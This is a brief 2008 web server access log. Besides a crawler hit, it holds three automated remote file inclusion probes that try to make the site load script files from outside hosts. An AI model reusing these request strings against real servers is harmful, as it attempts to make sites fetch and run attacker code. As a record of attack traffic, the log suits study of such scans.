65.55.208.123 - - [03/Nov/2008:02:18:41 -0600] "GET /logs/access_log.1173139200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
79.170.90.64 - - [03/Nov/2008:02:18:59 -0600] "GET /logs/access_log.1208044800//vwar/backup/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.810"
69.72.144.18 - - [03/Nov/2008:02:19:10 -0600] "GET /index.php?link=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
69.72.144.18 - - [03/Nov/2008:02:19:10 -0600] "GET /logs/index.php?link=http://geocities.com/ronikoe/z6id.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
